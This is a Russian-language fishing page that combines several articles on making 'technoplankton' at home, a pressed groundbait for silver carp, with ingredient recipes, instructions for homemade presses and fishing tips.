672 просмотров
Рейтинг статьи
1 звезда2 звезды3 звезды4 звезды5 звезд
Загрузка...

Рецепт технопланктона для пресса на сухую

Изготовление технопланктона своими руками

Несколько лет назад никто и предположить не мог, что в ближайшем будущем сможет ловить толстолобик целенаправленно. Дело в том, что поймать толстолоба – это была редкая удача. Но сейчас многие используют техноплактон – специальную приманку для этой рыбы.

Технопланктон – это смесь сухих прикормок мелкого помола.

Обычно, он изготовлен в виде капсул, которые так и называются «палочки толстолоба». Главная задача технопланктона – пылить и мутить воду.

Наиболее популярным является венгерский технопланктон, оснащенный ароматными добавками на основе вишни, клубники, корицы, а также кукурузы и ванили.

Больше всего толстолобиков в реке Амур. Но распространили они свои владения на многие реки, пруды, и даже узкие каналы. Отправляясь на рыбалку, не забудьте приготовить технопланктон, принцип работы которого не отличается особой сложностью.

Принцип работы

Основной принцип заключается в двух этапах:

  1. Оказавшись в воде, брикет технопланктона начинает набрякать и выбрасывать прикормочную смесь, напоминающую настоящий планктон.
  2. Рыба, привлеченная мутной смесью, подплывает к брикету и попадается на крючок.

Размягчение происходит в разном временном промежутке: 20 – 180 минут. Тяжелые элементы оседают на дно, легкие всплывают на поверхность. Все это происходит довольно медленно, поэтому сопровождается мутным распылением.

Достоинства:

  1. Действует не только на толстолоба.
  2. В отличие от других прикормок, не нужно ждать всю ночь, пока технопланктон растворится.
  3. Приятный запах.

Недостатки:

  1. Цена. Три пластинки – норма для поездки на рыбалку – стоят 200 рублей.
  2. Много подделок.

Изготовление в домашних условиях

Несмотря на то, что сегодня предлагается огромный выбор всевозможных приманок, в том числе и для толстолоба, многие предпочитают изготавливать их самостоятельно.

Вот лишь некоторые преимущества:

  1. Экономия средств.
  2. Возможность создавать уникальные рецепты.
  3. Судя по наблюдениям рыбаков, толстолобик с большей охотой клюет на домашнюю прикормку.

Необходимые компоненты:

  1. Клеящие и растворяющие компоненты: мальтодекстрин, сухое молоко, крахмал, сахарная пудра.
  2. Наполнители: мука, молотые сухари, молотое печенье.
  3. Ароматизаторы: ваниль, карамель, мед.

Как на фабрике, так и в домашних условиях, изготовление технопланктона требует следующих действий:

  1. Подготовка компонентов для смеси.
  2. Превращение этих компонентов в тестообразную массу.
  3. Прессовка.

Разные рецепты

Предлагаем на ваше усмотрение несколько рецептов технопланктона.

Рецепт первый:

  • 0,5 кг кукурузной муки;
  • 0,3 кг мамалыги;
  • 0,5 кг манки;
  • 0,3 кг панировки;
  • 0,3 сахара;

Перемешать в ведре и спрессовать.

Рецепт второй:

  • 1 банка сгущенки;
  • кусок порошкового торта 5×5 см;
  • сухое молоко;

В емкость выливается сгущенка с постепенным добавлением сухого молока и торта. Превращается миксером в сметанообразную массу. На 40 минут помещается в морозильник. После этого масса месится как тесто.

Снова добавляем постепенно сухое молоко и торт. Соединяем все это с водой и доводим до состояния клея. Затем полученный клей проводится на мелком сите, пока состав не станет зернистым, как песок.

Рецепт третий, часть 1:

  • 200 г сахара;
  • 50 г паприки;
  • 100 г жареного арахиса;
  • 500 г собачьего корма;

Рецепт третий, часть 2:

  • 500 г вареного картофеля;
  • 1 кг бананов;
  • 1 желток;
  • 50 г сгущенки;

Сперва нужно перемолоть арахис. Затем смешать все составляющие каждой части в отдельных посудинах. После этого объединить и замешать, превращая в тесто.

Рецепт четвертый:

  • 350 г макухи;
  • 350 г семян подсолнуха;
  • 150 г пшена;
  • 150 г риса;
  • 1 стакан кукурузы;
  • 100 г сухого молока;
  • 1 стакан фруктового киселя;

Перемалываем в кофемолке пшено, кукурузу, рис и семечки. Смешиваем миксером кисель и сухие ингредиенты. Доводим до влажной липкой смеси, прессуем, раскладываем на салфетку и просушиваем.

Рецепт пятый:

  • мука кукурузная – 9 г;
  • перемолотая сухая пряная трава – 1 г;
  • прожаренные пшеничные отруби – 5 г;
  • кукурузный декстрин высшего сорта – 7 г.;
  • мед – 3 г.;

Все тщательно перемешивается и сжимается прессом, давлением свыше 20 тонн. Сжимать нужно сухую массу. Получившийся блин разбивается на несколько частей и снова прессуется.

Получились качественные таблетки, похожие на профессиональные упаковочные. Плавучесть и скорость растворения приемлема.

Рецепт шестой:

  • основной состав неизменен: мука, макуха, отруби – на ваше усмотрение;
  • тертые огурцы;

Огурцы натираются на терке, потом сушатся в электросушилке. После просушки пропускаются через кофемолку. Получается огуречная мука с приятным запахом, привлекающим рыбу. Смешиваем сухие компоненты с огурцом, прессуем и прикормка готова.

Пресс для технопланктона

Без пресса невозможно добиться высокого результата, поскольку масса, находясь в воде, должна постепенно превращаться в пыльное облако.

В зависимости от способа прессования, вам может понадобиться:

  • металлическая или пластиковая труба;
  • цилиндр или пробка;
  • штырь;
  • сжимающее устройство;
  • поршень-выталкиватель;
  • микроволновая печь;

На первый взгляд изделие может показаться технологически сложным, но, фактически, каждый сможет сделать такую прикормку дома.

Существует два способа прессовки:

Холодная прессовка:

  1. Потребуется любая металлическая трубка, длиной около 90 см.
  2. К ней нужно подобрать соответствующий цилиндр.
  3. В его нижней части просверливается отверстие для штыря, который будет крепиться на нижней пробке, закрученной с помощью резьбы на нижнюю часть трубки.
  4. Засыпаем смесь под самый верх с помощью лейки и утрамбовываем.
  5. Отделяем смесь от формочек. Получился небольшой но плотный брикет.
  6. Прессуется помещенная внутрь трубки смесь, с помощью тисков или струбцины.

Горячая прессовка:

  1. Смесь помещается в пластмассовую трубу с плотно прилегающей пробкой.
  2. Уплотняется смесь поршнем-выталкивателем.
  3. Помещается на 30 секунд в микроволновку и задается режим максимальной мощности.
  4. После извлечения, смесь еще раз уплотняется.

Советы

  1. Для максимального запыления воды советуем добавить в смесь покрошенную винную пробку. Крошки будут всплывать и тянуть за собой мутные вещества.
  2. Толстолоб любит запах меда летом, и запах трав осенью-весной. Также замечено, что этой рыбине нравится запах чеснока. Эти ингредиенты мелкими порциями можно добавлять в основные компоненты смеси.
  3. Для быстрого распыления смеси в воде, в состав часто добавляют соду, сухой квас или лимонную кислоту.
  4. Чтобы крючок не достигал дна водоема, можно нанизать на него шарики пенопласта.
  5. Толстолобик – сильная и большая рыба. Ее вес иногда превышает 8 килограмм. Поэтому катушка, леска и другие снасти должны быть максимально крепкими. Рекомендуется использовать подсак.

Теперь не нужно затруднять себя поисками способов ловли толстолоба. Способ один, и он проверенный – технопланктон, изготовленный своими руками.

Рецепты, как сделать технопланктон блоха своими руками

Для того чтобы рыбалка была завершена успешно, надо овладеть большим количеством тонкостей. Важно, к примеру, изучить вкусовые предпочтения рыб. В частности, толстолобик, сазан, амур, плотва и караси любят технопланктон. Это особая смесь питательных веществ, выпускаемая в виде брекетов. После попадания в воду она постепенно растворяется.

Принцип действия приманки

Использовать технопланктон предельно просто. В брикете имеется отверстие для оснастки. К нему прикрепляют некоторое количество крючков, которые должны быть подвешены параллельно. Как только обитатели водоема подплывают к облаку еды, они начинают поедать пищу, не замечают крючков и заглатывают их.

Универсальность технопланктона состоит в том, что:

  • он подходит для поимки рыбы на дне;
  • его признают эффективным при ловле на поверхности с поплавком.

Если приходится ловить рыбу на дне, лучше использовать быстрорастворимые варианты. Они распадаются примерно за полчаса. Если есть подозрение, что клёва долго не будет, желательно использовать так называемые долгоиграющие типы. Для их растворения требуется несколько часов. Такие виды планктона подойдут и для поплавковой снасти. Используют указанный тип оснастки с середины весны и до середины осени.

Состав смеси

Состав технопланктона блоха для пресса надо обязательно знать, если имеется намерение самостоятельно изготовить смесь. В ней должны быть такие компоненты, которые могли бы сделать содержимое брикета более притягательным для рыбы. Если все было сделано правильно, компоненты иметь разную плавучесть и удельный вес. За счет этого облако питательных веществ при растворении пищевого комка образует несколько уровней.

Промышленные виды могут различаться по составу, в зависимости от производителя. Если планируется самостоятельно изготовить его, используя пресс для технопланктона, то желательно использовать следующие компоненты:

  1. Наполнители. Это могут быть кукуруза, овсянка, горох, гречка, пшёнка, сухое печенье. Всё это должно быть измельчено до состояния муки.
  2. Склеивающие вещества. Необходимы для того, чтобы не дать пищевому комку быстро раствориться. Мальтодекстрин, декстрин, сухие сливки и молоко, сахарная пудра входят в эту категорию. Желательно применять комбинацию из указанных компонентов, а не использовать их по отдельности.
  3. Ароматизаторы. Годятся для использования в любом виде. Требуется использовать такое их количество, при котором замес был бы устойчивым. Рыбам нравятся сладкие ароматы: клубники, мёда, малины, ванили и карамели.
  4. Замедлитель растворения. С этой ролью превосходно справляются рисовая мука и крахмал.
  5. Увлажнитель. Его роль играет обычно вода.
  6. Пузырящийся компонент. Обеспечивает так называемый эффект гейзера. За счет этого ингредиенты растворяются, попадая в воду. Это могут быть пищевая сода, таблетки-шипучки, сухая закваска для кваса. Соотношение, в котором надо брать эту составляющую рецепта, составляет 1/6.

Рецепты приготовления

Преимуществами изготовления в домашних условиях технопланктона является:

  • значительная экономия средств;
  • возможность самостоятельно придумывать уникальные рецепты.

По наблюдениям опытных рыболовов, некоторые виды рыб гораздо охотнее клюют на домашнюю прикормку.

У каждого рыбака есть свой особенный рецепт, который он считает наиболее эффективным. Но есть составы, которые признаны наиболее популярными.

Рецепт 1:

  • Кукурузная мука — 200 г. Альтернативой может послужить перемолотый в кофемолке попкорн.
  • Пшеничная мука — 200 г.
  • Овсяная мука — 300 г.
  • Манная крупа — 200 г.
  • 150 г соды + немного лимонной кислоты.

Все составляющие рецепта перемешивают и смачивают небольшим количеством воды. Жидкости надо добавить столько, чтобы сформировалось пластичное тесто. Его перемещают в пресс и делают брикеты. Также можно запечь полученную смесь в микроволновой печи. Шипучая смесь может быть смешана с массой прямо перед прессованием.

Рецепт 2:

  • манная крупа — 0,5 кг;
  • кукурузная мука — 0,5 кг;
  • панировочные сухари — 300 г;
  • мамалыга — 300 г;
  • сахар — 300 г.

Смесь перемешивается до однородного состояния, после чего её понемногу разбавляют медовым раствором.

Рецепт 3:

  • банка сгущенного молока;
  • торт в порошке;
  • сухая молочная смесь.

Сгущённое молоко выливают в любую подходящую посуду и постепенно добавляют сухие компоненты. Как только смесь достигнет консистенции сметаны, перемещают ее в морозилку на полчаса. Важно, чтобы смесь для торта и сухое молоко были добавлены в одинаковом количестве. По прошествии 30 минут достают готовое тесто и замешивают его, добавляя заново в равных количествах сухие ингредиенты. Сыпучие компоненты добавляются понемногу, чтобы не допустить слишком быстрого загустения теста. Для большей клейкости увлажняют его водой. В конце приготовления пропускают тесто через сито и отправляют под пресс.

Приманка для карповых

Этот рецепт хорошо подходит для рыб семейства карповых. Он включает в себя:

  • кукурузную муку — 100 г;
  • соевую муку или прикорм для карпа — 100 г;
  • отруби — 10 г;
  • декстрин — 30 г;
  • мед — 16 г;
  • вода — 16 г;
  • банка анисового масла.

Приготовление смеси в миксере

Все компоненты этого рецепта перемешиваются в миксере, после чего отправляются под пресс. Универсальный рецепт для любых видов рыб включает в себя:

  • готовый фруктовый кисель — 250 г;
  • мед — 50 г;
  • овсяная мука — 100 г;
  • ржаная, кукурузная, гороховая мука — по 100 г;
  • отруби — 100 г;
  • панировочные сухари, рисовые хлопья — по 100 г;
  • измельченные семечки подсолнечника — 200 г;
  • шипучая смесь — 175 г.

Чтобы приготовить прикорм для донной рыбалки, требуется:

  • собачий корм — 0,5 кг;
  • жареный молотый арахис — 100 г;
  • высушенные сладкий перец — 50 г;
  • сахарная пудра — 1 стакан.

Аналогичный рецепт можно использовать для поплавкового лова, но для него потребуется больше компонентов в сухом виде.

Влияние условий рыбалки

Для приготовления рецептов технопланктона своими руками, не требуется ничего сложного, но не помешает учесть ряд моментов. В первую очередь, это условия рыбалки. Если предстоит рыбачить на дне, то потребуется вещества, растворяющиеся постепенно и оставляющие значительный мутный след после себя.

Если речь идет о ловле на дне, непременно надо добавлять ингредиенты, которые имеют свойство «пылить». Это должны быть составляющие, которые могут плавать, допустим, отруби, пробка от вина, перемолотая до мелких частиц.

Пресс для производства технопланктона

Такое оборудование обязательно требуется тех, кто планирует самостоятельно готовить дома технопланктон. Существует несколько его видов:

  • механический винтовой пресс;
  • гидравлический пресс высокого давления.

В качестве альтернативы могут выступать такие методы получения технопланктона, как прессование в микроволновке и сжимание домкратом.

Простая модификация для холодного прессования включает в себя следующие составляющие:

  • Стакан. Предназначается для выпрессовки. Потребуется трубка из металла длиной 10 см с небольшим диаметром и резьбой на одном конце, чтобы можно было накрутить пробку.
  • Пробка. Ее роль может выполнять накручивающаяся заглушка для водопроводной трубы.
  • Штырь. Используется для отверстия в снастях. В шляпке от заглушки высверливают отверстия и фиксируют в нём прочный и тонкий штык. Он требуется для обустройства отверстия в готовом бочонке. Пробку накручивают на основную трубку.
  • Уплотнитель. Подбирается металлический цилиндр такого диаметра, чтобы он с легкостью входил в трубку и при этом был плотно прижатыми к ней. У цилиндра длина должна быть та же, что и у трубки. На внутренний поршень можно накручивать такую же пробку.

Алгоритм работы:

  • на основную трубку накручивается пробка;
  • трубка заполняется замесом;
  • вставляется поршень;
  • домкратом или слесарными тисками зажимается конструкция;
  • поршень вынимается, после чего у трубки откручивается крышка;
  • полученный бочонок технопланктона выталкивается наружу.

Чтобы проделать аналогичные процессы в микроволновой печи, есть несколько вариантов.

Применение пластиковой трубки

Берут пластиковую трубу небольшого диаметра — примерно 30 мм. Отрезают кусок длиной 7 см. Берут две пробки и плотно закрывают оба конца трубки. Один конец закрывается пробкой, а с противоположного запихивается смесь. Пробкой закрывается противоположный конец. После этого можно отправить смесь запекаться в микроволновую печь. Можно не использовать крышки, чтобы закрыть трубки и просто поставить пищевой комок запекаться.

Использование шприца

Берут 2 одноразового шприца с объемом 20 мл. Со стороны носика иглы обрезают один шприц так, чтобы получился цилиндр. С одной стороны он запекается поршнем и заполняется веществом. С другой стороны его плотно зажимают поршнем от другого шприца. Вслед за этим можно вставить второй поршень. В то же время можно его вынуть и отправить цилиндр в микроволновку.

Холодное прессование в микроволновой печи

Во время холодного прессования готовую смесь закладывают в оборудование и придают ей твёрдость, используя силу давление. При этом она превращается в бочонок-таблетку.

Если для этих целей применяется микроволновая печь, то здесь используется энергия электромагнитного излучения. Вещество помещается в пластиковый тубус с пробками на обоих концах. При холодном прессовании держать смесь нужно не более 30 секунд.

Дополнительные советы

При подборе прикормки важно учитывать время года. Бывает, что рыба предпочитает одни компоненты летом, тогда как в весенние месяцы она остаётся к ним равнодушной. Если вследствие жары водоём сильно зацвел, то рыба не будет испытывать интереса к прикормке. Это обусловлено тем, что в пруду отмечается изобилие корма в этот период. По этой причине лучше сменить водоем на другой, где есть чистая вода.

Ловля на донную снасть предполагает использование пенопластовых шариков. Благодаря им удается поднять крючки над технопланктоном. Эти изделия не требуются при поплавковой рыбалке.

Иногда бывает, что течение сносит облако еды от крючков. В этом случае можно использовать расположенный между удилищем и поплавком скользящий груз на леске. Он должен быть небольшим по весу. Снасть может запутаться при вываживании улова, поэтому надо проявлять внимательность. Желательно также регулярно менять крючки и заменять их на новые перед каждой рыбалкой.

Технопланктон на толстолобика своими руками: топ 5 рецептов

Примерно 10 лет тому назад на рынке появилась подобная приманка, хотя начали ее изготавливать на Британских островах. Через некоторое время она появилась в Европе, но здесь ее уже начали изготавливать в промышленных масштабах.

В наше время технопланктон можно встретить в любом специализированном магазине. Несмотря на это, многие рыболовы практикуют изготовление этой приманки самостоятельно, из подручных средств. Как правило, опытные рыболовы все основные ингредиенты находят у себя на кухне.

До появления технопланктона, толстолобика пытались ловить на различные насадки растительного происхождения. Это были кубики из свежих огурцов, молодой тростник, соцветия огурцов и т.д. С появлением технопланктона изменился общий подход в рыбалке за толстолобиком, что сняло часть проблем. Теперь его стало ловить легче. К сожалению, высокая стоимость бочонков, настораживает многих рыболовов и подталкивает на различного рода эксперименты. Для наших рыбаков главное – это идея, а решить ее и воплотить в жизнь существуют различные способы, чем они и занимаются.

Чтобы воплотить в жизнь подобную идею не обязательно иметь дорогостоящие или редкие ингредиенты. Изготовление подобной приманки доступно для каждого желающего рыболова. Причем, изготовление бочонков возможно, по абсолютно различным рецептам, в том числе и своим.

Характеристика технопланктона

Физическая основа подобной приманки – это совокупность различных составляющих, имеющих определенные пропорции. Технопланктон изготавливается в виде бочонка, который при попадании в воду, ведет себя весьма своеобразно.

Попадая в воду, составляющие начинают медленно растворяться, создавая огромное облако из мелких частиц, которые очень любит толстолобик. Особенно, это интересно, если посмотреть на это облако сбоку: оно схожее с огромным количеством взвешенных в воде мелких частиц, которые привлекают толстолобика.

Как действует бочонок?

Действует прессованный бочонок очень просто, а все, что очень просто, считается гениальным. На оснастке располагаются крючки на поводках, имеющих различную длину. Когда появляется объемное пищевое облако, крючки располагаются внутри него. Толстолобик, засасывая технопланктон, засасывает и крючки.

Приманка достаточно универсальная и ее можно применять на любых водных горизонтах, в том числе и на дне.

Но для этого:

  • Если предполагается ловить рыбу со дна, то лучше взять, быстрорастворимые бочонки, с периодом распада до получаса.
  • При ловле на поплавочную удочку или в условиях, когда рыба ведет себя пассивно, желательно подбирать плотные бочонки, с периодом распада до нескольких часов.

Составляющие технопланктона

Выпускаются бочонки с различными ингредиентами. Поэтому, имеется возможность подобрать приманку под свои условия ловли. Несмотря на это, многие производители не раскрывают некоторых секретов производства. В связи с этим, нашим рыболовам приходится экспериментировать.

Если при приготовлении приманки бочонки плохо прессуются, то в них необходимо добавить немного воды. Количество воды рассчитывается исходя из расходов на приготовление 1-го бочонка: ее необходимо около полграмма. Результатом подобного производства должен появиться бочонок, характеризующийся определенной плотностью и твердостью.

Для уменьшения скорости разложения приманки в воде, в состав следует ввести крахмал или рисовую муку. При этом, нужно быть осторожным, так как их передозировка приводит к обратному эффекту: бочонок будет растворяться намного быстрее.

Наполнитель

Этот ингредиент играет основную роль в приготовлении качественных бочонков. В основном, для этой цели выбирается овсяная, кукурузная, гречневая, гороховая или пшеничная мука. Если есть возможность, то в основной состав можно ввести сухарики, измельчив их до состояния муки.

Приготовление технопланктона не требует тщательного соблюдения пропорций. Самое главное – это тщательная обработка каждого ингредиента, хотя рыба может проигнорировать любой аромат. Например, сухарики или печенье многие рыболовы рекомендуют поджарить на сковородке для более яркого аромата. Кроме этого, овсяная мука способна создать именно то кормовое облако, которое необходимо.

Клеевая основа

Клеевая основа необходима для того, чтобы бочонок имел определенную прочность. Несмотря на это, она должна не затруднять процесс распада приманки на мелкие частицы.

В домашних условиях возможно применение:

  • Мальтодекстрина.
  • Декстрина.
  • Сахарной пудры.
  • Сухого молока.
  • Сухих сливок.

Наличие клеевой основы должно составлять не больше 10% от наличия всех ингредиентов.

Применение ароматизаторов

Применять ароматизаторы или нет – зависит от того, кто занимается ловлей рыбы. Этот ингредиент, в данном случае, не обязательный. Эти вещества выпускаются как в виде сухих порошков, так и в виде жидкостей. Как правило, они характеризуются очень сильным ароматом, который не оставит равнодушным никого. В основном, используются сладкие ароматы, такие, как ваниль, пряности, медовые, клубника или малина.

Преимущества и недостатки технопланктона

К достоинствам следует отнести:

  1. Наличие аромата, привлекающего рыбу.
  2. Кроме толстолобика, на него можно ловить и другие виды рыб.
  3. Только подобные составы обеспечивают большое мутное облако мелкого корма в толще воды.

Недостатки приманки:

  • Бочонки заводского изготовления дорого стоят.
  • Очень часто встречаются подделки, которые не отвечают заявленным характеристикам.

Подобные недостатки можно свести к нулю, если технопланктон делать самому в домашних условиях.

5 лучших рецептов изготовления технопланктона в домашних условиях

Насколько известно, то на сегодняшний день имеется достаточное количество чертежей для изготовления специальных приспособлений. Чтобы их найти, не нужно далеко ходить, а достаточно воспользоваться Интернетом. При этом, следует строго соблюдать инструкции, указанные в статье.

Рецепт №1

Набор ингредиентов:

  • Мука гречневая – 200 граммов.
  • Мука овсяная – 200 граммов.
  • Мука кукурузная – 400 граммов.
  • Сухари панировочные – 200 граммов.
  • Сахар – 100 граммов.
  • Вода – 100 мл.

Техника приготовления:

  1. В первую очередь готовится сахарный сироп, растопив в воде сахар.
  2. В отдельной емкости смешиваются все сухие составляющие.
  3. Не большими порциями сироп заливается в сухую смесь, после чего все измельчается блендером.
  4. На заключительном этапе, готовая смесь заливается в форму для прессования.

Рецепт №2

Набор компонентов:

  • Мука кукурузная – 500 граммов.
  • Крупа манная – 50 граммов.
  • Жареный арахис в измельченном виде до состояния муки – 500 граммов.
  • Рыбный порошок – 1 кг.
  • Шипучка – 450 граммов.

Этапы приготовления:

  1. Смешиваются все сыпучие компоненты.
  2. Приготовить сахарный сироп, как и в первом рецепте.
  3. Тоненькой струйкой залить сироп в сухую смесь, перемешав все очень тщательно миксером.

Рецепт №3

Основные составляющие:

  • Кукурузная мука – 200 граммов.
  • Мука овсяная – 300 граммов.
  • Манная крупа – 200 граммов.
  • Шипучее вещество – 150 граммов.

Как приготовить:

  1. Смешиваются вместе все ингредиенты.
  2. В сухую смесь добавить чуть-чуть воды, после чего можно приступать к прессованию.

Рецепт №4

Что нужно:

  • Обжаренная на сковороде макуха – 200 граммов.
  • Дерть – 200 граммов.
  • Сухое молоко – 200 граммов.
  • Семена укропа измельченные – 20 граммов.
  • Кислота лимонная – 15 граммов.
  • Крахмал – 60 граммов.

Как приготовить:

  1. Смешиваются все сыпучие вещества в одной емкости.
  2. Добавить немного воды и тщательно перемешать, до получения однородной массы.

Рецепт №5

Что необходимо иметь:

  • Манную крупу – 0,5 кг.
  • Кукурузную муку – 0,5 кг.
  • Сухое молоко – 0,5 кг.
  • Панировочные сухари – 0,3 кг.
  • Мамалыгу – 0,3 кг.
  • Сахарную пудру – 0,3 кг.
  • Мед – 0,05 кг.
  • Шипучку – 0,4 кг.

Этапы приготовления:

  1. Все компоненты, за исключением меда, смешиваются до однородной массы.
  2. В последнюю очередь следует добавить мед, при этом нужно следить за влажностью смеси.

Какая рыба ловится на технопланктон?

Технопланктон разработан для ловли той рыбы, которая всасывает корм в процессе приема пищи. Состав любого рецепта технопланктона всегда содержит компоненты, которые позволяют рыбе кормиться именно этим способом. К таким рыбам относится толстолобик, а также другие виды рыб, такие, как сазан, карп, сорожка, подлещик и даже окунь.

Технопланктон на толстолобика

Как было сказано выше, подобный тип приманки создавался именно для ловли толстолобика. По истечении некоторого времени стало понятно, что на нее можно ловить и другую рыбу. В связи с этим, стали разрабатываться бочонки и с ингредиентами, рассчитанными для ловли карпа, сазана и т.д. Другими словами, это тот же технопланктон, но рассчитанный под другие условия ловли.

Самостоятельные изготовления приспособлений

Основным приспособлением считается пресс, без которого получить бочонок классического технопланктона невозможно. Изготовить его совсем не сложно, если следовать таким этапам:

  1. Заготовить небольшой отрезок металлической трубы с отверстиями, расположенными на одинаковом расстоянии одно от другого.
  2. В отверстия следует вставить по винту, чтобы они могли выполнять функции устройства, фиксирующего пресс.
  3. Все винты должны быть укомплектованы гайками.
  4. Емкость с аромовставкой помещается в эту трубу.
  5. После этого можно приступать к заполнению конструкции самодельным составом технопланктона.

Некоторые нюансы приготовления технопланктона своими руками

Каким бы простым ни было приготовление приманки в домашних условиях, лучше соблюдать некоторые, неписанные правила. Например:

  • При изготовлении технопланктона, необходимо всегда применять составы, которые способны к созданию мути в толще воды, в процессе соприкосновения с ней. Наличие мелких частиц, которые отделяются от прессованного бочонка и всплывают или распределяются по отдельным горизонтам и призвано привлекать рыбу. Находясь во взвешенном состоянии, мутное облако напоминает планктон – кормовую базу толстолобика.
  • Приманка должна иметь в своем составе, как легкие, так и тяжелые элементы, чтобы они могли правильно распределиться в толще воды.
  • Не следует использовать больше пяти ингредиентов. В данном случае, следует руководствоваться тем, что на первом месте должно быть качество, но не количество.

Как указывают многие рыболовы, сделать технопланктон самостоятельно совсем не сложно, но лучше сначала приобрести простое приспособление, которое поможет ускорить процесс приготовления смеси.

В основной состав обязательно следует вводить сухое молоко или его аналоги. Подобные ингредиенты довольно легко оставляют после себя мутный след. Если предполагается рыбалка со дна, то не помешает еще и крахмал. Вместо него подойдут овсяные отруби. Как показывает практика – это достаточно неплохой вариант. Как правило, отруби, после отделения от бочонка, начинают всплывать, что непременно заинтересует толстолобика.

Заключение

Все приманки, произведенные в условиях промышленных предприятий, обладают эффектом гейзера. Подобного эффекта можно достичь и в домашних условиях, если добавить в рецепт соду или лимонную кислоту. Такого же эффекта можно достичь, если воспользоваться «Алкозельцером».

Правильно подобранный рецепт и правильная технология должны привести к тому, что состав начнет распадаться где-то через 2 минут. Если бочонок будет распадаться намного быстрее, то вряд ли можно рассчитывать на результативную рыбалку. Скорее всего, что состав не сработает, так как неправильно сформирован бочонок и неправильно подобраны составляющие.

Изготовление технопланктона

Самостоятельное изготовление технопланктона.

В предыдущих статьях мы уже разбирали краткий процесс изготовления технопланктона, зачем он используется и как на него ловить. В данной статье большое внимание мы постараемся уделить приготовлению технопланктона самостоятельно, дома. Однако для начала кратко о том, что мы уже знаем о технопланктоне.

Технопланктон своими руками

Ну, во-первых, стоит напомнить, что же вообще такое этот технопланктон. Чаще всего это спрессованные брикеты, которые включают в себя различную измельченную до порошкового состояния прикормку. При попадании в воде данный брикет начинает разлагаться, что приводит к формированию облака из фракций прикормки. Рыба чаще всего и попадается на крючок благодаря этому облаку – она не видит всего происходящего внутри облака еды, а просто без разбору засасывает все, тем самым натыкаясь на незаметный крючок, который спрятан в гуще мути. Время разложения приманки бывает разное и может варьироваться от тридцати минут до двух часов (а иногда и трех). Мы говорили, что технопланктон – это брикет из сухого корма. Особенностями такого планктона является капсульный вид, действует сразу на несколько рыб, но более на толстолобика, своей главной задачей имеет создание мути, которая способна закрыть собой крючок, в него можно добавлять разнообразные аттрактанты, как и другая приманка — может изготавливаться дома. Итак, мы упомянули толстолобика как первого и главного любителя технопланктона. На кого же еще можно им ловить? Ну, это может быть фидерная рыба вроде леща, подлещика, карпа, сазана, либо другая поверхностная рыба как, например, окунь или сорожка.

Работает технопланктон своими руками довольно-таки просто и голову ломать тут не приходиться. Сначала приманка касается воды, где она разбухает, и когда она достаточно разбухла наступает момент разложения, когда в воде распространяется мутное облако частиц приманки. Рыба, видя перед собой облако еды, начинает ее употреблять, без опасения всасывая фракции. Вот именно так она и попадается на крючок. А дальше все по стандартной программе: вы делаете подсечку, либо рыба подсекает себя сама, и вытаскиваете ее.

Технопланктону изготовленному своими руками присущи различные качества, как плохие, так и хорошие. Из недостатков можно выделить следующие факты: постоянное подделывание приманки, то есть многие недобросовестные производители могут пытаться подделать свой товар под брендовый и он, конечно же, получается намного более низкого качества. И здесь возникает вторая проблема, которая заключается в том, что технопланктон имеет относительно большую цену, когда он качественен. Есть и плюсы у данной приманки и их на порядок больше: приманки всегда имеют притягательную форму для рыбы, кроме этого они способны помогать ловить многие разновидности, распадение на фракции происходит у технопланктона значительно быстрей.

Итак, время поговорить о домашнем изготовлении. И начать нужно с пресса. Вообще привыкли выделать две формы прессовки технопланктона, одна из них горячий пресс, а другая холодный. Разберем их особенности. Горячая прессовка происходит по следующему алгоритму: в патрубок из пластмассы помещается прикормочная масса. На конце у патрубка фиксируется пробочка. С использованием поршня данная масса утрамбовывается внутри. Затем всю конструкцию вы должны помести в СВЧ печь и продержать около минуты, после чего извлеките планктон и положите под пресс. Что касается холодной прессовки, то там немного дольше: у трубки фиксируете любую вещь формы цилиндра, снизу вставляете спицу, после чего фиксируете пробочку в низу у патрубка. Приготовленную спицу вставляете в пробку, после чего засыпаете корм и трамбуете, после этого убираете массу из формы и кладете под пресс.

Рецепты технопланктона

Несколько практичных рецептов изготовления технопланктона.

Рецепт номер один. Вам понадобится: манная крупа (1,5 стакана), кукурузная крупа (1,5 стакана), сухое молоко (1,5 стакана), суха для панировки (1 стакан), сахар (1 стакан), мед (5 столовых ложек), шипучка (пару таблеток). Способ приготовления предельно прост: смешиваются все ингредиенты, которые предварительно были доведены до порошкового состояния, а затем для влажности добавляется немного воды.

Рецепт номер два. Вам понадобится: кукурузная крупа (стакан), пшено (стакан), рис (три столовые ложки), сухое молоко (три столовые ложки), сахарный сироп (100 миллилитров). Сначала кипятите сироп около двадцати пяти минут, после чего туда добавляете остатки ингредиентов.

Рецепт номер три. Вам понадобиться: кисель из фруктов (250 миллилитров), семена подсолнуха (стакан), мед (5 ст. ложек), горох (пол стакана), овсянка и отруби (по пол стакана каждого), кукурузное зерно (пол стакана), порошок ржаной и сухое молоко (стакан), шипучки (пару таблеток), рис и сухари для панировки (по сто грамм). Все сухие ингредиенты перемалываются, мед растворите в киселе, и все смешайте.

Вот так вот можно приготовить пресс и брикет самому дома своими руками. Это очень практично и после тренировок не будет занимать у вас много времени. Поэтому смело беритесь экспериментировать сами, тогда ловля станет еще приятней. Удачи вам!

Донный технопланктон своими руками

Еще пятнадцать-двадцать лет тому рыбаки и представить себе не могли, что это реально – направленно ловить толстолобиков снастями. Такая рыбка, как правило, шла на крючок лишь случайным образом. Сегодня удачливая «охота» на толстолоба воплощена в реальность, и все благодаря данной волшебной смеси – искусственному планктону. Какой она обязана быть по консистенции? И реально ли смастерить технопланктон своими руками? Об этом расскажет наша следующая статья. Надеемся, что она станет полезна и для новичка, и для заядлого рыболова.

Что это такое и с чем его рыбы едят?

Спрессованная смесь из различного мелко измельчённого корма по форме похожабочонки или таблетки, а попав в водную среду, растворяется и образует облачко со взвешенными частицами, что и напоминает по внешнему виду своему тот естественный планктон, которым толстолоб питается. После закидывания технического планктона рыбаку необходимо будет выждать хотя бы с полчасика, не трогая в эти минуты оснастку. Потому что как только приманка попала в воду, ее верхняя оболочка, что составляет почти третью часть таблетки, начинает растворяться, давая муть, которая и привлекает рыбу. От смеси начинают отделяться мельчайшие частицы корма. Толстолобик останавливается и выжидает, когда же отделится последующий вкусный комок. Некоторые нетерпеливые экземпляры пытаются специально толкнуть корм, чтобы он «сыпался» поскорее. И если вода относительно спокойна, а поплавки при этом качаются, то значит, приманка понравилась толстолобику и вскорости следует ждать поклевок (которые могут быть весьма результативными).

Технопланктон своими руками

